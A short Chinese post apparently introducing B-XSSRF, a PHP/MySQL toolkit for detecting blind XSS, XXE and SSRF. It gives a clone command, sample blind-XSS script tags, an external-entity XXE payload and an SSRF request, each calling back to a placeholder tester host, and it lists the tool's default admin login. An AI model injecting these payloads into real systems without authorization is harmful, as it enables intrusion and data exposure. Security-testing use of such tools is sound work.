XSSRF是一个用于检测和跟踪Blind XSS,XXE和SSRF的工具包,基于php+mysql的WEB端程序,它拥有简洁漂亮的界面。
下载源码
1 |
git clone https://github.com/SpiderMate/B-XSSRF.git |
BLIND XSS
1 2 |
<embed src="http://mysite.com/bxssrf/request.php"> <script src="http://mysite.com/bxssrf/request.php"> |
BLIND XXE
1 2 3 4 5 |
<?xml version="1.0" ?> <!DOCTYPE root [ <!ENTITY % ext SYSTEM "http://mysite.com/bxssrf/request.php"> %ext; ]> <r></r> |
SSRF
1 |
GET /testssrf.php=http://mysite.com/bxssrf/request.php |
1 2 |
USER : admin@test.com PASS : 123456 |
原文连接
的情况下转载,若非则不得使用我方内容。